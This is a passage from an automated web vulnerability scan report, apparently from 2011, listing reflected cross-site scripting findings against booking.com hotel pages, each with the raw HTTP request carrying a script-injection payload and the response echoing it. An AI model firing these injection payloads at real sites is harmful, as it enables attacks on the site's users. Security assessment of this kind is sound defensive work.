u4o5b; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:16:34 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 55496
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
m_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=endabd9</script><script>alert(1)</script>c4e3a42ad78',
b_this_url : '/error404.en-us.html?aid=323804;label=hotel-59554;sid=9fcdaabed9e2bb46b60772539b0ca101',

"setvar_affiliate_is_bookings2" : 1,


transl_close_x : 'close',
transl_close_calendar:
...[SNIP]...
4.183. http://www.booking.com/hotel/us/c-boston-massachusettes.html [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68dfe"><script>alert(1)</script>faaef80a365 was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en68dfe"><script>alert(1)</script>faaef80a365 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 01:16:14 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXKL1ATovZy06Br3gSlD7BzBu3eTMil8Y%2FCy4jbYosmGhqGZu8JcPFESWI09oW8zlInDyaExFuTRDduuckwUzZ6gH7VDYQiy%2Fx2maGo3L3ZYSpa00GGRwhRQnWkdPnpvjabILpFxS5R3pCwbKDjikQjblcdWTy3nemV3VYA23%2BJb%2BbgUsaDmQObOurpPRSh1kNfzWpRIp4PN7eB%2Bsgl0L01n%2FXIisIRgkf2am8SKzMQLJDNeNvlEbU8zBIB5216Iass2D5UD4G4tr0hU3D%2Fvu4NPNNgVKfrUTYkTVOrhWHKD9zx7sp036Ih1l3IaEmrRpgpW1mObFvF6mI8TGX0lhxx80vXSXnJR23zgVYT0UrU7QW%2Frji2DEXXWfEU765KoY6igkm%2Bpw5NCp1zkSl7UaF%2BQvANUP%2B3kcXfdcptqFVlZbLt2mTObgg6KLvAJKM3QgV640uGhRqe6BpwnH68O04kw1Q5wruMeyQO9xYyTskwfK3IEZ2lDLVOmJ%2BJMwu%2BcwzhyESnh%2B29jW3IpkV%2BwdZXmZmKW2AEKpLBmPapNjMx0TC6n78t3sfRoUY4f5ZkV3hDvBDp8kb5ef9DTnFGL66JxzBefURBqD3thxnGPv3g4F4LYLvcFyphz5YXJi1mXoFzRPux7oNJp2P0yGDYj4Ydhrh2FHKU64oxs6s0p99tdNA9YcivDlWiBji4moIMXQZ2LXHrf5v1hVTFCqrTMXJuPk2dCvbGtCp7MqbKCLYoMNZ4zbTKfAJ9qYGJzXL9NjjgDr42zZsOazNDtoFMeNmURAxyGiyilkLgICx9RwWke1VyAQ04zo2zH%2BljUtyOIG6RxuotrY%2F48%2FAXu35GIPgdwSZ4IvQlzx7xDgABlhnAcYf6W9AbqTg8Q0zQKkOKFY5MMkmpYdWEwv37f%2BXFThGUgRo8xW11tSFFZ9IZFuqVadWZ4eM9XTuK%2F3xxhF1AIFw3x0YTa8Z0CRhiGH08O%2FOREGSS6ix1yGIRcsBMDgyDX06T9%2BC%2BN251Mb4iUNpWflWeKZXZbRPOjqoE0TWugJyL93CbFI3OUm0MZO3Iew9KeaBKbxlRCYWsa0J1cWYpritDWZvZdn3JWY5WhVYz7cDL4%2FEOpzd5B8IAlFaQGn3SRbIEihCOiWab%2F5SmEM8h0tOaI4NuOtMmpkGiHhu%2BSQp2SkYI%2FNtONltD37VFCEt343X14UptsnwFO3UkL5idhEi3abuEFUir7vxoklLQSjII2zGYSgSTmb2IPiwuKrKM81FiulwQDtppYFVNGGoq4XrnEY%2Fu%2FsjvBKreWW6y2S2fJC5kvnV3NwkF5icyc%2FlVFMMPMVza5XT68mb7zCwGvBaTlUVxeTPSCn7Y0hTmjW89cNHKRw6332K4hz2qV%2FwDcYUKZi2yytna0uP%2BmaWgp%2F2KSra%2BLWEM6Nqqivy6jjVw%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:16:14 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 55483
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
m_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en68dfe"><script>alert(1)</script>faaef80a365">
...[SNIP]...
4.184. http://www.booking.com/hotel/us/c-boston-massachusettes.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e603a"><script>alert(1)</script>4178c1e27b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en&e603a"><script>alert(1)</script>4178c1e27b3=1 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:16:37 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YV721dMcSbN4sTMjg6DJx7HaHS0Wu0DonGruQ19C5%2FA2qwp1uvnNC5LVmEZc%2FtD1X1w4xTGvBb2G71SGaRMBvID57Yanw9uScUOt940TVeeaUgqpS1YShC4kjKNg57XijsKAC2j2mwWCKDGStgBC6sTjB3%2FWgfEM87EKWcRIJyqg0GEKabkj9CEJEyWm04nb9QB%2BQ84LCo7LgTfGOHW7BiixkUqVZAydOmJ1X8u4P5PXNBllvMUdAPeuPsD%2B8lnVUNG3trDLVacg0NzPDp27DiAsrAttvm6a%2BVrBtOS6LZZ%2F5jRj%2BdtGwRN1k9R8PWj%2Fm47Mz3uilEy1jl4sZvvApowYkUymolIit0e8S6zt8yNjVHZql7jwEJN%2FJOXf3HaA7Y71wtiPNPFlVAu%2Bm55r4A%2FxyfLargsHl%2BsHVpzGdL1osyPN7t7enDzwE7hs2PvqTyD72vu2ah2tgYhoZQ0ZQVumaIHfeyUB%2Fp2hjdMRBtoDvfoei%2BuJzbvGsgYsGU0pVIp0Ofg5WXmVDub3Zc3tMFq4nEx8y3OepEoByBFm3CJAB7HTbSOEfSGS2AlYi3OPjpwU1iNblWEnUrMvHO%2BiOi2rqvgNHKQWixtu4LttcQnPtSr84YM3Wnn9kxiJLAW6g%2B3RtALfxU4%2BB2Bou%2FvyeMTDC%2Bggu%2FfI%2FhsBlsiQ40BEkdZkUAOA8eEbGBtTeKW2vx2PXG%2BCYrM3mQdB4gctyHXkS8WnJ%2F%2BaRmm7Sx3ytJ%2FzAafSldVeHoXDlneYtnEXkmQE32nYXgvhkRShU3Z97KIlGwpmjnkSFrawo2DWkRnhtZHzv%2FlHJ7nx4iNBLh0Uc8EJnpC3vINgBoBpFdiYOXh8HWtd%2BN2H9KK1Rb4dgioB0WAOOAj13oIFGI1opQHkaOgoPfbIUVjJaypGYt8bzUVRoG6QSABR6aNBSwSJWJNaBOX5orB2Jm9cM7cPoSBdwCJM%2Fk6qKkN1UZwnYd94G94jWlDqZCKC1j73hq50xRI9A0KGDjYpeSqBfiVP9bGqmr88R2g9nw5t%2Bt58rBjAoNqXbsbi2MgRpUEh%2FQd%2BjSwxCLzwTPmI66zdKa%2BMPhDnwgSnOir%2BkcB%2FAfgh82SRIQ6PmkODAfEe71TTzSuxXL89G5LMx6wT6xS0dQQl0wXKbZDLJn%2FhTpHiFy9STiLwsTluT8Ca%2FqgMbAiSQZpxQQkmCqSmBVuW%2F%2BHnXYqBn9r8hdapx804KeW6PompL5kh4Mwg12M2djKzxPB5lyezdJtQ72xKwYlrIPlFvly8zq4OQk6AFFeWxUVwzC9LXxIAyVQdjh4aQk%2BIzoHz65zInWf87fi%2B1HOBtAxlSVPiavKSYc%2BnuTgT7AbcAm0xSpdL4uAB1ReZOESgCQ%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:16:38 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 232687
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<link rel="canonical" href="http://www.booking.com/hotel/us/c-boston-massachusettes.en.html?e603a"><script>alert(1)</script>4178c1e27b3=1;utm_content=text-cr;utm_medium=SPPC;utm_source=tripad;utm_term=hotel-59554" />
...[SNIP]...
4.185. http://www.booking.com/hotel/us/c-boston-massachusettes.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c610'%3balert(1)//55af9cf3306 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4c610';alert(1)//55af9cf3306 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en&4c610'%3balert(1)//55af9cf3306=1 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:16:42 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YV721dMcSbN4sTMjg6DJx7HaHS0Wu0DonGruQ19C5%2FA2qwp1uvnNC5LVmEZc%2FtD1X1w4xTGvBb2GiCt8D7ORFDe3lfF0wKb%2F4eRfndplWbbZBdA%2BdNjey38HBB9H87PxV8GQZGitP9QX%2FNyod6Bkp0m0Ju5c1Izs0OWVMihgahfjOq5lb5YlfKHjtv%2BGRD%2BdiWK0bVArxa55rxtIgmhzzt9B5jiQwAhC2HcCYbL%2Bik2%2BbWW3xbWYz6ArAHFU%2FggBlevuCC1e8o5g95315Zax1vM%2F7vROlc3mG3AsyIzl3gZQZ4YOmbxxbqOidFfQ8WZninFeO0Hrkw39lfF8GEW5v4HNMwOQ3O0XdBQdJkiOxnogCmPzOhYPj1AQkYU5WnZ93JH5pW9PWmQBYBoMktis1U9L22chjwgFmWifGS008LoqbPDAGAjVV93jZ9WHqddvgqeNj2ELsSF%2Fa7oWXGLV1lQNQHp3z8qG0nF%2FSc5qbI2zpHk%2FzcsarbQtDh%2FVEb0M6jPnpBwdck9ra06bI%2FHa9eSZgPTl%2BiBuvJ8fEI19V7UJ93t8frT8lxMmA0500oeTFRaQoTLSYrjE9J3Ks48m6CRCCSNjol7Zu8FPmo1ZeJmv3let1dEAWkl9fncFE6chn0Eew5RvH1qYOnzRG9HzfD%2F9GO7bODQK428cJkRpvuuDKCW5Na%2FxnJRnyBERbVgCMtTK5jkvHrFgJSyztVyFJ2jooOiitkP5MJ8nLmWjHMCECv48OgbxxtxjNuNBA09zzxJNktpjb1NzBr%2BrOs5Peo264Nn9MdHCrmDOimX5pyETtQGJiaD6eMATvQBiZ6dHVgDrFA79BncEFNlIUEpba4XgNFirf%2F%2F5wdQ1w3xYoXIoLGhkVWoMxD475%2Bh%2B5pAcTT3CFHEIYFRymlmqp4REahpEyBxosQxbdsrHhiF5Vuis7NwyvJ2A9FkiyvU31QhICtehHFundtnypbYtIZx%2BGlGkasdWnsH3WxoTZggAlcSzsDsqSDfQIp1eoZh3eWuRkzvtHxbtvM3a6JlrkgZm9BHe0J%2FSF8hFm4MnY3jrrZBqEkAgKIcDgdCeiIJnMU4vLwON86eAsl2%2FhGOESNU0kjjgQXgJl8sDPAf603qWgaNxSGA7sGqFS1Y5PfG4HhSSUGgPN2fH29jYOmqq7k3u6c6yKdqlmsup0uHhRmZRdxjWtJ1pPx6M%2FosFZyaFGwtmffZeM0iDGUSNliPMPzPIdThgqKZ2rZ943qErcPbrbrY6OwUxWx6ppbEtOJQfUF%2Bq2sLaUakFXKxKHJYgXwJ6VxOZiwKG1mFN%2FGGmSRgzgD2sr32RzdB%2B%2FVwDXtyBPrIJxxa5q2Snt4OOILnjoQVBEsdzCBIo4H9OCA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:16:43 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 232522
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
= 'show automatic translation';
var transl_undo = 'undo';


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/hotel/us/c-boston-massachusettes.en.html?4c610';alert(1)//55af9cf3306=1;utm_content=text-cr;utm_medium=SPPC;utm_source=tripad;utm_term=hotel-59554';
booking.env.b_canonical_url_delimiter = ';';
booking.env.b_query_params_delimiter = ';';


booking.env.group_room =
...[SNIP]...
4.186. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_content parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the utm_content request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27066'-alert(1)-'d20d72902ca was submitted in the utm_content parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr27066'-alert(1)-'d20d72902ca&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6m